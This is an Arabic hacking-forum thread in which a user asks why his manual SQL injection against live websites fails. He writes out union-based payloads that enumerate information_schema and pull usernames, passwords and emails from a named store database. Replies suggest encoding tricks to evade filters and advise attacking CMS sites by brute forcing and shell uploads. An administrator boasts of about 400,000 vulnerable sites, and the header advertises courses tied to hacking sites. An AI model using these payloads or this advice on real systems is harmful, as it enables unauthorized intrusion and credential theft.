1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

خطا اثناء الحقن اليدوي

الموضوع في '[ غـــرفه الحــقن ]' بواسطة lort2010, بتاريخ ‏4 يونيو 2014.

كاتب الموضوع : lort2010 المشاهدات : 619 الردود : 7 ‏4 يونيو 2014
حالة الموضوع:
مغلق
  1. غير متصل

    lort2010
    rank
    Developer

    عضو منذ:
    ‏25 ابريل 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    بسم الله الرحمن الرحيم

    اثناء الحقن اليدوي و عند الخطوه


    group_concat(table_name,0x3a,column_name,0x3a,table_schema)

    ونضع هدا لأمر في آخر الرابط

    +from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)

    يجيلي user:passowrd:bestwest_store

    و لما اجي اشفر الاوامر عن طريق الموقع Waraxe IT Security Portal - Sql Char Encoder Online Tool

    و اكتب الامر دا مكان العمود المصاب group_concat(table_name,0x3a,column_name,0x3a,table_schema)

    و الامر دا في اخر الرابط +from+information_schema.columns+where+table_name=0x75736572

    مش بيطلعلي اي حاجه و المفروض يطلع مثلا الكلام بالشكل دا user:idUser:bestwest_store user:fullname:bestwest_store user:password:bestwest_store وهكذا لكن مش بيطلعلي اي حاجه و لما باجي اطبق الامر دا بعديه مكان العمود المصاب group_concat(username,0x3a,password,0x3a,email)
    و دا في اخر الرابط
    +from+bestwest_store.user

    بيجيلي الخطاء دا
    MySQL Error: Table 'bestwest_store.user' doesn't exist

    ايه الحل .. الموضوع دا مش من موقع واحد دا معظم المواقع الي بحاول استغل ال sql فيها ممكن حل ..
     


    جاري تحميل الصفحة...
  2. غير متصل

    Red Virus
    rankrank
    Developer

    عضو منذ:
    ‏4 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: خطا اثناء الحقن اليدوي

    مش عارف ايه المشكله بس يمكن مساعدتك اخونا isdo213
     


  3. غير متصل

    Sudan Tiger
    V • I • P

    عضو منذ:
    ‏25 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    22
    نقاط الجائزة:

    رد: خطا اثناء الحقن اليدوي

    وعليكم السلام ياغالي

    ثغرة sql اصبح من الصعب الحصول علي موقع مصاب بها

    حتي واذا وجد سوف تواجهك مشاكل كثيرة اثناء الحقن

    لذلك تعلم استهداف السيرفرات

    واكيد راح تجد ثغرات اخرى للاختراق الموقع المستهدف

    مثل التخمين الجومالا اوالوردبريس

    او ثغرة ابلود شل

    او ثغرات ثمات الوردبريس

    وغيرها

    لاتعتمد علي ثغرة واحدة في استهداف السيرفر

    والله ولي التوفيق

    :{12}::{12}:
     


  4. غير متصل

    isdo213 isdo213
    Developer

    عضو منذ:
    ‏16 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    24
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Web Developer
    الإقامة:

    رد: خطا اثناء الحقن اليدوي

    حبيبي بعد فترة الاختبارات راح اكمل الدورة واضع حل للمشاكل

    اما بالنسبة لمشكلتك هي قم بتشفير حرف ب http encode base64

    تحياتي isdo213!:"
     


  5. غير متصل

    lort2010
    rank
    Developer

    عضو منذ:
    ‏25 ابريل 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: خطا اثناء الحقن اليدوي

    اخي ما انا شفرت User و الخطاء بيطلع كما هو موضوع في الموضوع
     


  6. غير متصل

    isdo213 isdo213
    Developer

    عضو منذ:
    ‏16 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    24
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Web Developer
    الإقامة:

    رد: خطا اثناء الحقن اليدوي

    لا حبيبي المشكلة قد تكون فقط في الحرف الاول مثلا groube_concat مثلا في حرف G شفره بال HTTP ENCODE base64
     


  7. غير متصل

    lort2010
    rank
    Developer

    عضو منذ:
    ‏25 ابريل 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: خطا اثناء الحقن اليدوي

    مشكور اخي
     


  8. غير متصل

    Ahmed El Melegy InjectorBoy
    طاقم الإدارة

    عضو منذ:
    ‏24 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    215
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:


    ثغرات الحقن من أقوى الثغرات واكثرها تواجد فى العالم الإفتراضي على الإطلاق

    وهي كما هو معروف مصنفها من أكثر واخطر الثغرات إنتشاراً

    ومن حيثٌ صعوبة العثور علي موقع مصاب بها فأنا لدي مايٌقارب الـ 400 ألف موقع مصاب بها

    والصعوبة الوحيده اللى فيها هي تخطى مشاكلها عن طريق الأدوات هذا كثير مايفشل والحل الأكيد دائما فى الحقن اليدوي

    تابع معي عزيزي

    بالتوفيق للجميع
     


    أعجب بهذه المشاركة dracula1337
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...